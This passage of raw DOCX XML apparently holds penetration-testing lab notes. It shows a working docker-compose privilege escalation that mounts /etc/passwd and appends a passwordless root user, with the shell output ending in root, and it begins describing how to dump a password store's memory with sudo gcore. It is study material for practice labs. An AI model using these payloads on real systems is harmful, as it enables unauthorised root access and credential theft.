        <w:t xml:space="preserve"> PG practice, they saw this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/docker compose -f /home/mcsam/app/skillforge-docker/docker-compose.yaml up -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In plain english: This command runs Docker Compose (using the Docker binary at /usr/bin/docker), tells it to use the docker-compose.yaml file located at /home/mcsam/app/skillforge-docker/, and starts all the services defined in that file in detached (background) mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag tells Docker Compose which YAML file to use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">up</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells Docker Compose to create and start containers based on the services defined in the YAML file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short for detached mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Runs the containers in the background instead of attaching to their logs in your terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without -d, the containers’ output would stream directly to your console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit the ability to run docker compose as root, we first verify whether we have write access to the existing Compose file at: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/mcsam/app/skillforge-docker/docker-compose.yaml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirms that mcsam has write permissions to this file. This allows us to replace the contents of the file with a custom Docker Compose configuration that will help us escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our goal is to mount the host’s /etc/ directory into a container and append a new user entry to /etc/passwd to gain a root shell. We can edit the docker-compose.yaml file with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version: "3.8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">services:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  suidbash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: ubuntu:latest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    container_name: suid_bash_container</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002000">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002001">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /etc/passwd:/mnt/passwd:rw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002002">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    entrypoint: ["/bin/bash", "-c", "echo 'root2::0:0::/root:/bin/bash' &gt;&gt; /mnt/passwd &amp;&amp; tail -f /dev/null"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002003">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    tty: true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002004">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this don't work, then try giving a password to root2 user since sometimes linux doesn't allow no-password logins. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002005">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image50.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image50.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId693"/>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2006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With our malicious docker-compose.yaml in place, the final step is to run Docker Compose using sudo to apply the configuration and execute our payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002007">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mcsam@SkillForge:~$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/docker compose -f /home/mcsam/app/skillforge-docker/docker-compose.yaml up -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002008">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WARN[0000] /home/mcsam/app/skillforge-docker/docker-compose.yaml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002009">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] Running 1/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ✔ Container suid_bash_container  Started                                                                                                       10.4s </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And viola we become root on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mcsam@SkillForge:~$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> su root2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@SkillForge:/home/mcsam# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002010">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002011">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1llwswxgzxp2" w:id="278"/>
      <w:bookmarkEnd w:id="278"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/gcore </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002013">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002014">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId694">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pelican</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. Looking up gcore on Google we see it is an application for dumping information out of memory for running processes. You can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo gcore $PID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to dump information out of a memory for that PID. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002015">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002016">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, the hard part is finding a process with the useful information. In the writeup, they used "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to find interesting processes, and they found "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/password-store</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" (this name was cut off in this writeup but seen in other write ups). Another writeup found this by looking at the files with SUID bit set. The PID was </w:t>
      </w:r>
